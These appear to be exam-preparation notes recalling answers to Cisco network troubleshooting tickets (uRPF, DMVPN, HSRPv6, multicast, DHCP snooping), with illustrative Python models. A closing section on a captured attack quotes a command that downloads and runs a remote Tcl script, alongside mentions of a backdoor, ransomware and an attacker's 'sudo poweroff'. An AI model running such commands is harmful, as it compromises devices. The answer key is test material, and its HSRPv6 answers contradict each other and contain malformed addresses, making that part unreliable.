---OLD DIAG---

Ticket 1 (Port Security)

Hint: the port connecting to the host is down/down (PortFast and Port Security are configured; switch 3 has a wrong hardcoded MAC address, which needs to be removed or corrected with the Host 1 MAC address)

Which switch has the problem?
- SW3
Which command would you use to identify the problem?
- show ip interface brief
Which information will you request to solve the problem?
- Device: Host 1
- Question: Ask Host1 MAC Address

Ticket 2 (VTP Password)

Hint: the port connecting to the host is up/up, but the VTP revision number of SW3 (client) is 0 and that of SW4 (VTP server) is not 0. SW3 does not have all the VLANs of SW4.

Which switch has the problem?
- SW3
Which command would you use to identify the problem?
- show vtp status
Which information will you request to solve the problem?
- Device: SW3
- Question: Ask for VTP Password

Ticket 3 (DMVPN, route-map)

Hint: the NBMA (public WAN) address of the Hub is advertised into the DMVPN tunnel (midchain error; recursive lookup); R15 (hub) does not have a route-map when redistributing connected.

Which device has the problem?
- R15 (it is the hub)
Which is the cause or resolution of the problem?
- Exclude Ethernet0/0 (NBMA interface) from EIGRP
- Suppress the NBMA advertisement on the Hub (alternate option)
- Hub is injecting NBMA causing Recursive Routing (alternate option)

Ticket 4 (DMVPN, subnet)

Hint: R15 (hub) has a route-map when redistributing connected that excludes the NBMA. R15 has a /30 NBMA IP address, but R16 has the wrong subnet mask, /29 instead of /30.

Which device has the problem?
- R16 (it is a spoke)
Which is the cause or resolution of the problem?
- Increase the subnet mask length from /29 to /30 on Ethernet 0/2

Ticket 5 (uRPF, reply received on wrong interface)

Topology diagram (not reproduced): R1, R2, R3

Given: R1-R2 and R1-R3 are eBGP; R2-R3 is iBGP. R1 has uRPF configured on interface e0/2 (connected to R2).

Hint: R1 prefers the R1-R3 path to reach the Web (8.8.8.8 or 0.0.0.0), but the Web prefers the R2-R1 path, a different path, to reach Host 1 (which is behind R1).

When a packet is received on an interface where Unicast RPF and ACLs are configured, the following happens in order:
1. Input ACLs are checked
2. Unicast RPF checks whether the packet arrived on the best return path to its source by doing a reverse lookup in the FIB table
3. CEF lookup is carried out for packet forwarding
4. Output ACLs are checked
5. The packet is forwarded

Why Host 1 is unable to ping the web server:
1. R1 looks up its routing table (FIB) and selects interface E0/3 as the egress interface
2. R1 translates the source IP to its interface Loopback 11
3. R1 transmits the ICMP request to R3 via interface E0/3
4. Packets are received by R3 and forwarded to the destination
5. The destination replies with an echo reply
6. The echo reply is routed via R2
7. R2 transmits the echo reply to R1 (R1 receives it on E0/2, not the interface it sent from)
8. Unicast RPF on R1 drops the echo reply (the FIB shows the route to that source is via Eth0/3)

What is the most likely cause of the problem?
- uRPF
- Asymmetric routing with unicast RPF

Ticket 6 (BGP Policy, ACL)

Topology diagram (not reproduced): R1, R2, R3

Hint: no uRPF in this ticket. An input ACL is configured on R1's eth1/0, the link to R2.

Why Host 1 is unable to ping the web server:
1. R1 looks up its routing table (FIB) and selects interface E2/0 as the egress interface
2. R1 translates the source IP to its interface Loopback 11
3. R1 transmits the ICMP request to R3 via interface E2/0
4. Packets are received by R3 and forwarded to the destination
5. The destination replies with an echo reply
6. The echo reply is routed via R2
7. R2 transmits the echo reply to R1 (not the same interface, but there is no uRPF, so it does not matter)
8. The ACL on R1 drops the echo reply

What is the most likely cause of the problem?
- Traffic dropped via access list

Ticket 7 (New uRPF)

Given: same topology.
Hint:
1. R1 is configured for eBGP multipath and uRPF loose mode; it uses per-destination load balancing
2. R2 and R3 are both in uRPF strict mode; they prefer the route to Loop11 and Loop12 via R3-R1
3. Logs on R1 (show ip cef exact-route <hosts> <internet>) show that if the path is towards R2, the packet is dropped on R2; if the path is towards R3, it will NOT be dropped.

Why Host 1 is unable to ping the web server:
1. R1 receives the ICMP packet from Host 1
2. R1 looks up its routing table (FIB) and selects interface E1/0 (towards R2) as the egress interface
3. R1 translates the source IP to its interface Loopback 11
4. R1 transmits the ICMP request to R2 via interface E1/0
5. R2 receives the packet on its ingress interface
6. R2 performs the RPF check on the received packet
7. The packet fails the RPF check because the return path to R1 Loopback11 is via R3
8. R2 drops the packet (understand the flow)

What is the most likely cause of the problem?
- uRPF strict mode with per-destination load balancing (in another version there is no RPF on R1, just to confuse, but everything else is the same)
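As an added illustration for Tickets 5 and 7 (not part of the original notes or of any Cisco code), the following Python model applies the strict and loose reverse-path rule to a FIB; the FIB entries, the interface names and the Loopback11 address 10.11.11.11 are constructed assumptions.

```python
import ipaddress
from typing import Dict, List, Optional, Tuple

# FIB: prefix -> egress interfaces. More than one interface on a prefix
# models eBGP multipath (Ticket 7); every entry below is constructed.
Fib = Dict[str, List[str]]

def lpm(fib: Fib, addr: str) -> Optional[Tuple[int, List[str]]]:
    """Longest-prefix match: (prefix length, egress interfaces) or None."""
    ip = ipaddress.ip_address(addr)
    best = None
    for prefix, ifaces in fib.items():
        net = ipaddress.ip_network(prefix)
        if ip in net and (best is None or net.prefixlen > best[0]):
            best = (net.prefixlen, ifaces)
    return best

def urpf_check(fib: Fib, src: str, ingress: str, mode: str, allow_default: bool = False) -> bool:
    """Reverse-path check on the packet's SOURCE address (step 2 of the processing order).
    strict (reachable-via rx): the FIB's best path back to src must leave via the ingress interface.
    loose  (reachable-via any): any FIB route to src is enough.
    A default route satisfies either mode only when allow-default is set."""
    match = lpm(fib, src)
    if match is None:
        return False
    prefixlen, ifaces = match
    if prefixlen == 0 and not allow_default:
        return False
    return True if mode == "loose" else ingress in ifaces

# Ticket 5, R1: the Internet is reachable only via E0/3 (R3); E0/2 leads to R2.
R1_FIB = {"0.0.0.0/0": ["E0/3"], "8.8.8.0/24": ["E0/3"],
          "203.0.113.0/30": ["E0/2"], "198.51.100.0/30": ["E0/3"]}

def ticket5_reply_accepted(mode: str) -> bool:
    """Echo reply from 8.8.8.8 comes back through R2 and arrives on E0/2 (asymmetric path)."""
    return urpf_check(R1_FIB, "8.8.8.8", "E0/2", mode)

# Ticket 7, strict mode on R2 and R3: both prefer Loopback11 (placeholder 10.11.11.11) via the R3-R1 link.
R2_FIB = {"10.11.11.11/32": ["E0/1-to-R3"], "0.0.0.0/0": ["E0/2-to-Internet"]}
R3_FIB = {"10.11.11.11/32": ["E0/0-to-R1"], "0.0.0.0/0": ["E0/2-to-Internet"]}

def ticket7_accepted(next_hop: str) -> bool:
    """R1 load-balances per destination; whichever router the packet lands on runs the strict check."""
    if next_hop == "R2":
        return urpf_check(R2_FIB, "10.11.11.11", "E0/0-to-R1", "strict")  # arrived from R1, FIB says R3
    return urpf_check(R3_FIB, "10.11.11.11", "E0/0-to-R1", "strict")
```

In strict mode the Ticket 5 echo reply arriving on E0/2 fails while loose mode accepts it, and in Ticket 7 only the flows that R1 hashes towards R2 fail R2's strict check.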
---NEW DIAG---
HSRPv6
HSRPv6 has been configured between two CE routers; each router connects to its own PE router. When both routers are online, no hosts are able to reach the Internet and they cannot reach the PE routers.

Description:
- No IPv6 connection from LAN to Internet. CE1 and CE2 are configured in HSRP for IPv6; CE1 is Active with Router-Preference Low and HSRP priority 200, CE2 is Standby with Router-Preference High and HSRP priority 100. HSRP preemption is configured on both.
Issue
- Router with the higher Router-Preference. Check the console logs on the Host: the default route is pointing to FE80:::666. (The router with the higher Router-Preference must be configured with the higher HSRP priority. Only one router in the HSRP group is active, and the current Active HSRP router has "Low" router-preference, but there is a rogue device in the LAN with the better "Medium" router-preference, and hosts use the ND RA information from the rogue device and select it as their gateway.)
Resolve
- Set the HSRP priority on CE2 to the highest (so it becomes Active and starts sending Router Advertisements with Router-Preference High)
Which line in Wireshark?
- You may filter the RAs with "icmpv6.type==134" or "icmpv6.nd.ra.flag.prf". The first RA frame from ffe::666 is the answer (sequence number 227; note it can be different and you may need to search).

Other feedback:

Indicate which device has the possible cause of this issue.
- Answer: CE1 (router with high route-preference, but low HSRPv6 priority)
What would you do to resolve the issue?
- Answer: Raise the priority higher than 200 on CE1.
Indicate what information is the possible cause of this issue?
- Answer: Choose the first HSRP negotiation packet.

What would you do to resolve the issue?
- Answer: Shut down the interface connecting to the LAN on CE1.
What device is causing the issue and why?
- Device: unknown device in the LAN
Why:
- It is sending RAs with a higher preference than the default gateway
Indicate what information is the possible cause of this issue?
- From the Wireshark capture, you may filter the RAs with "icmpv6.type==134" or "icmpv6.nd.ra.flag.prf". The first RA frame from ffe::666 is the answer.
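Added example (not from the original notes): a Python parser for the Router Advertisement flags that the icmpv6.nd.ra.flag.prf filter displays, with a constructed capture showing why hosts pick the rogue device's Medium preference over CE1's Low; the link-local addresses fe80::ce:1, fe80::ce:2 and fe80::bad are placeholders.

```python
import struct
from typing import Dict, List, Optional, Tuple

# RFC 4191 Prf encoding in the RA flags byte (bits 4-3); 10 is reserved and treated as Medium.
PRF_NAME = {0b01: "High", 0b00: "Medium", 0b11: "Low", 0b10: "Medium"}
PRF_RANK = {"High": 2, "Medium": 1, "Low": 0}

def parse_ra(icmp: bytes) -> Dict[str, object]:
    """Parse the fixed 16-byte part of an ICMPv6 Router Advertisement (RFC 4861 section 4.2)."""
    if len(icmp) < 16:
        raise ValueError("too short for a Router Advertisement")
    typ, code, _csum, hop_limit, flags, lifetime, _reach, _retrans = struct.unpack("!BBHBBHII", icmp[:16])
    if typ != 134 or code != 0:
        raise ValueError("not a Router Advertisement (icmpv6.type==134)")
    return {"cur_hop_limit": hop_limit, "managed": bool(flags & 0x80),
            "other": bool(flags & 0x40), "prf": PRF_NAME[(flags >> 3) & 0b11],
            "router_lifetime": lifetime}

def build_ra(prf: int, lifetime: int = 1800) -> bytes:
    """Constructed RA with the given 2-bit Prf (checksum left zero; not a wire-valid frame)."""
    return struct.pack("!BBHBBHII", 134, 0, 0, 64, (prf & 0b11) << 3, lifetime, 0, 0)

def choose_default_router(capture: List[Tuple[str, bytes]]) -> Optional[str]:
    """Host behaviour per RFC 4191: among RAs with a non-zero Router Lifetime, pick the best Prf.
    Ties are broken by source address here only to keep the result deterministic."""
    ranked = []
    for src, icmp in capture:
        ra = parse_ra(icmp)
        if ra["router_lifetime"] > 0:
            ranked.append((PRF_RANK[ra["prf"]], src))
    return max(ranked)[1] if ranked else None

# Constructed capture for the ticket: CE1 is HSRP Active and advertises with Prf Low,
# while an unknown device on the LAN advertises with the default Prf Medium.
CE1_LL, ROGUE_LL = "fe80::ce:1", "fe80::bad"   # placeholder link-local addresses
BEFORE_FIX = [(CE1_LL, build_ra(0b11)), (ROGUE_LL, build_ra(0b00))]

def gateway_after_fix() -> Optional[str]:
    """After CE2's HSRP priority is raised it becomes Active and advertises Prf High; CE1 is
    modelled here as withdrawing itself (Router Lifetime 0, i.e. not a default router)."""
    return choose_default_router([("fe80::ce:2", build_ra(0b01)), (CE1_LL, build_ra(0b11, lifetime=0)),
                                  (ROGUE_LL, build_ra(0b00))])
```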
Multicast
You are working in the network team and one of your responsibilities is to solve problems. There is a problem in the multicast network this morning and Site3 cannot use IPTV services. (It can be Site 2 as well.)

Indicate the possible cause of this issue
- Answer: No route to the RP (10.1.4.0/24) on R3 (this could be R2 depending on the version)

What question should you ask the network engineer at Site3?
- Answer: Why is there no route to 10.1.4.0/24 on R3?

Quick Solve
- Answer: Static (or mroute) route on R3 to the RP (R4): ip route 10.1.4.1 0.0.0.0 10.0.0.17

Another Version:

Which device?
- Answer: R2

Cause
- Answer: wrong RP config

Resolve
- Answer: Ask RP Config

---NEWEST DIAG---
DHCP Snooping

Additional Information
Server1 = new install, cannot get a DHCP IP from R1
Server2 = new install, successfully retrieved a DHCP IP address from R1.
R1 = DHCP server
SW1/SW2 = L2 only; snooping only
SW3/SW4 = L2+L3.
SW1 is running DHCP Snooping. All interfaces are trusted, even the access ports, with [ip dhcp-snooping trust]. SW1 is also passing Option 82 data upstream.
SW3 is the DHCP Relay with [ip dhcp relay information option] configured.
SW3 does NOT have [ip dhcp relay information trust-all] configured.
The packet capture shows DHCP-Discover messages only (in relation to DHCP). The packets are tagged with dot1q.
Packets for DHCP-Offer, Request, and Accept are never seen.

All inter-switch links are using EtherChannel.
All trunks are operational and passing all VLANs properly.
All VLANs are configured properly on the switches.

Switch with the Issue:
- It's the relay switch (mine was SW3, it can be different in other versions) and Cisco tells you which switch is the Relay Switch.

Which command helped me identify the issue on the switch?
- It's show ip dhcp relay info trusted (it's empty, so no interfaces are trusted).

Where was the packet capture taken?
- Link between the Relay Switch (SW3) and the Snoop Switch (SW1) facing Server1.

Filter Wireshark with bootp:
- Find the first DHCP Discover message (check option 82 inside it) and select it. Mine was #113.
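Added example (not from the original notes or from Cisco): a Python model of the relay-agent check that SW3 applies to a DHCPDISCOVER carrying option 82 with giaddr 0.0.0.0, the rule from RFC 3046 that [ip dhcp relay information trust-all] relaxes; the packets, the option 82 contents and the MAC addresses are constructed.

```python
import socket
import struct
from typing import Dict, Optional

OPT_MSG_TYPE, OPT_RELAY_AGENT_INFO, OPT_END, OPT_PAD = 53, 82, 255, 0
DHCPDISCOVER = 1
MAGIC = b"\x63\x82\x53\x63"

def build_discover(giaddr: str, option82: Optional[bytes]) -> bytes:
    """Constructed DHCPDISCOVER: 236-byte BOOTP header (RFC 2131), magic cookie, options."""
    header = struct.pack("!BBBBIHH4s4s4s4s16s64s128s", 1, 1, 6, 0, 0x3903F326, 0, 0x8000,
                         b"\0" * 4, b"\0" * 4, b"\0" * 4, socket.inet_aton(giaddr),
                         bytes.fromhex("aabbcc001122") + b"\0" * 10, b"\0" * 64, b"\0" * 128)
    options = bytes([OPT_MSG_TYPE, 1, DHCPDISCOVER])
    if option82 is not None:
        options += bytes([OPT_RELAY_AGENT_INFO, len(option82)]) + option82
    return header + MAGIC + options + bytes([OPT_END])

def parse_options(data: bytes) -> Dict[int, bytes]:
    """TLV walk over the DHCP options field; stops at End (255), skips Pad (0)."""
    opts, i = {}, 0
    while i < len(data) and data[i] != OPT_END:
        if data[i] == OPT_PAD:
            i += 1
            continue
        code, length = data[i], data[i + 1]
        opts[code] = data[i + 2:i + 2 + length]
        i += 2 + length
    return opts

def relay_decision(pkt: bytes, interface_trusted: bool) -> str:
    """RFC 3046 section 2.1.1: a client packet (giaddr 0.0.0.0) that already carries option 82
    is discarded unless it arrived on a trusted interface (trust-all / per-interface trusted)."""
    if pkt[236:240] != MAGIC:
        return "drop: no DHCP magic cookie"
    giaddr = pkt[24:28]
    opts = parse_options(pkt[240:])
    if giaddr == b"\0" * 4 and OPT_RELAY_AGENT_INFO in opts and not interface_trusted:
        return "drop: option 82 with giaddr 0.0.0.0 on untrusted interface"
    return "relay to server"

# Constructed option 82 as a snooping switch inserts it: sub-option 1 (circuit-id, Cisco style:
# type 0, len 4, VLAN, module, port) and sub-option 2 (remote-id: type 0, len 6, switch MAC).
SW1_OPTION82 = bytes([1, 6, 0, 4, 0, 10, 0, 1]) + bytes([2, 8, 0, 6]) + bytes.fromhex("001122334455")
SERVER1_DISCOVER = build_discover("0.0.0.0", SW1_OPTION82)   # passed through SW1 with option 82
SERVER2_DISCOVER = build_discover("0.0.0.0", None)           # reached the relay without option 82

def sw3_verdicts(trust_all: bool) -> Dict[str, str]:
    """What the relay does with each server's Discover, with and without trust-all configured."""
    return {"Server1": relay_decision(SERVER1_DISCOVER, trust_all), "Server2": relay_decision(SERVER2_DISCOVER, trust_all)}
```

The Server1 Discover is the one the capture shows with no Offer following it: it is dropped by the relay, while Server2's Discover, which carries no option 82, is relayed.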

TCL Script

Question 1
(Shows a PCAP)
- Filter Wireshark with http.request.method==GET; that will show you who GETs the TCL script and who sends it (the source doing the GET is the victim/router).
- With those IPs (Source/Victim and Hacker) you can eliminate 4 out of 9 answers.
- To eliminate the last one, select: Hacker is trying to install ransomware via backdoor (the other option is the exact opposite), so it's easy to select the correct answers!

What is happening in the network? (choose 4)
a. tcp session from A to B
b. tcp session from B to A (answer 3)
c. HTTP session from A to B (answer 1)
d. http session from B to A
e. ransomware installed by backdoor (answer 4)
f. backdoor installed by ransomware
g. tcl script downloaded from A
h. tcl script downloaded from B (answer 2)

Answers
1. HTTP session from A to B (be careful, as there is another option with HTTPS)
2. TCL script downloaded from B
3. TCP session from B to A
4. Ransomware installed by backdoor

For understanding:
1. HTTP session from A to B (A clicks a link it shouldn't and goes to B's phishing website.)
2. TCL script downloaded from B (A is the one running the 'get' command and downloads the tcl from B.)
3. TCP session from B to A (After A runs the tcl, it creates a backdoor port on itself and B connects to A using this newly created backdoor.)
4. Ransomware is installed by backdoor (B installs ransomware on A using the previously created backdoor.)

Question 2
Which command was used to execute the attack?
a. sherkfest
b. sudo poweroff
c. tclsh:/ copy flash via http (tclsh http://<victim_ip_address>/b2d.tcl; the tcl name may change in your exam).

Question 3
Which command, if issued from the hacker end, can bring down the complete system?
a. sudo poweroff

Question 4
How to quickly fix this problem?
a. e kill, kill the process.
